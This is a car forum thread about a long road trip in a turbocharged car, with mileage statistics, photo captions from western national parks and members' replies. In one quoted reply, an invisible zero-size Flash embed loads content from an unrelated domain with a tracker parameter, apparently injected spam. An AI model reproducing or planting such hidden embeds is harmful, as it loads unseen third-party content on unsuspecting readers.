NJ-CA-NV-UT-NJ With a Turbo *Lots of Pics*

Al Guapo

Jun 11, 2008
North Jersey
Hi,

I just got back from my long road trip. The car didn't skip a beat. Special thanks goes out to PowerHouse for engineering a great turbo kit and TTP for a rock solid tune. I'm just very happy that I didn't break down in some desert :clap: Some of the premium gas in the midwest was only 89 octane!

It's good to be back home...

According to my gauges here's what I have:
Average MPG ------ 22.3 MPG
Average MPH ------ 60 MPH
Gallons Used ------ 301.8 Gal
Total Time --------- 108:48:45

Here's the before and after mileage...
Bryce2Moab012.jpg

164.jpg

Here are the places I went to:

First stop I took 4751 home.
Bryce2Moab158.jpg

Yosemite NP
Bryce2Moab207.jpg

The Pacific Coast drive from San Francisco to Santa Monica...
Bryce2Moab397.jpg

Bryce2Moab421.jpg

Bryce2Moab424.jpg

Majove Desert from Santa Monica to Vegas
Bryce2Moab854.jpg

Vegas Baby...
Bryce2Moab1151.jpg

Zion NP, UT
Bryce2Moab1362.jpg

Bryce2Moab1370.jpg

Bryce2Moab1354.jpg

The drive from Zion NP to Bryce NP
Bryce2Moab1366.jpg

10,000 feet above sea level
Bryce2Moab1421.jpg

Dixie NF / Bryce NP. That SS in the background had NY plates!
Bryce2Moab1379.jpg

Hoodoos at Bryce at 7:30 AM
Bryce2Moab1820.jpg

Scenic Byway 12
Bryce2Moab1380.jpg

Bryce2Moab1620.jpg

Twin Rocks at Capitol Reef NP, UT Highway 24
Bryce2Moab1881.jpg

Chimney Rock also at Capitol Reef NP
Bryce2Moab1885.jpg

Arches NP, UT
ArchesNP028.jpg

ArchesNP012.jpg

Balanced Rock
ArchesNP029.jpg

• Sponsors (?)

+1 on the PH turbo.

Awesome trip and pics. Alas the furthest my car goes is about 1 mile. 1/4 real fast...then another 1/4 to slow down...then about a mile back to the crew area to cool down and datalog. There's a lot to be said for keeping a car very streetable and capable of driving across country. Nice balance of power and utility.

+1 on the PH turbo.

Awesome trip and pics. Alas the furthest my car goes is about 1 mile. 1/4 real fast...then another 1/4 to slow down...then about a mile back to the crew area to cool down and datalog. There's a lot to be said for keeping a car very streetable and capable of driving across country. Nice balance of power and utility.

Damn right on the +1 to PH. This is why I got this kit.

This is my only car so a streetable DD was priority #1 when I modded this car. Now my goal is to do the same trip with your 130+ trap speed. Hey, it's ok to dream.

Thanks.

Vegas Baby...
Bryce2Moab1151.jpg
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Man I love vegas. Sweet car too. I really like the spoiler delete option.

Thanks for posting those up:nice: I need to get out west one of these days to check out those places in person. In mid August, my g/f took a 10 day trip out in AZ and CA and took several thousand pics from the various parks out there:D Glad to hear the Bullitt gave you no troubles:rock:

Glad to hear the Bullitt gave you no troubles:rock:
I was VERY glad lol. There were places that you did NOT want to break down. Those were the places where I kept the needle in vac.

any crazy ass rock chips ..??? Love the pics ! im kinda partial to the cali ones ! lol

I kept my distance when cruising. It was a promise I made to myself before getting a black car. Even then I still caught a few :mad:

Cali was beautiful.

No, I was talking about the swirls. It could use a nice polish from a pro (and NOT a body shop who usually makes it worse). :nice:

Oh. Yes it has swirls. I detailed it myself and I'm no pro.

The car was also dirty in most of the shots. Remember these pics were all taken when on-the-go from state to state.

I too wouldn't take my car to a body shop to get it detailed. I'm just getting new parts installed and minor body mods.